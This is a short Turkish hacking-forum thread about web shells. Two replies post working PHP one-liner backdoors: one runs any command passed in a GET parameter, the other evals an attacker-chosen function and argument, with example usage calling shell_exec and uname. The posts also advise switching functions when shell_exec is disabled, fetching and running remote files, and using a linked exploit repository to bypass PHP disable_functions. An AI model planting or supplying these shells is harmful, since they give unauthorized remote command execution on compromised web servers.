Döküman Shell Nedir ?

Katılım
25 Ara 2018
Tepki puanı
826
Rating - 0%
Güzel konu, ellerine sağlık. Ek olarak birkaç ekleme yapayım. Webshell kullanmayın. Ben mesela birkaç tane basit php command execution için shell yazılımlarım var. Mesela
<?=`$_GET[_]`?>
(backtick syntax php içinde shell_exec fonksiyonunu çağırır.
Bazı durumlarda bazı php disable_functions ile komut çalıştıramayı bu tarz durumlarda hazır exploitleri kullanarak sistemde php konfigürasyonunda ayarlanmış fonksiyonları bypass ederek komut çalıştırabiliriz. Ben şahsen bu repo'yu beğeniyorum. https://github.com/mm0r1/exploits
 

Lav3y

https://t.me/lav3y
Katılım
19 Nis 2020
Tepki puanı
3,734
Rating - 0%
Güzel konu, ellerine sağlık. Ek olarak birkaç ekleme yapayım. Webshell kullanmayın. Ben mesela birkaç tane basit php command execution için shell yazılımlarım var. Mesela
<?=`$_GET[_]`?>
(backtick syntax php içinde shell_exec fonksiyonunu çağırır.
Bazı durumlarda bazı php disable_functions ile komut çalıştıramayı bu tarz durumlarda hazır exploitleri kullanarak sistemde php konfigürasyonunda ayarlanmış fonksiyonları bypass ederek komut çalıştırabiliriz. Ben şahsen bu repo'yu beğeniyorum. https://github.com/mm0r1/exploits
daha kullanışlısı olarak benden de bir ekleme
<?php eval($_GET['func']($_GET['exp'])); ?>
shell.php?func=shell_exec&exp=uname shell_exec kapalıysa diğerlerini dene, hepsi kapalıysa o zaman shell.php?func=file_get_contents uzaktan dosya çek çalıştır vesaire türetilebilir
 
131,586Konular
3,269,425Mesajlar
315,488Kullanıcılar
AkbarovSon Üye
Üst Alt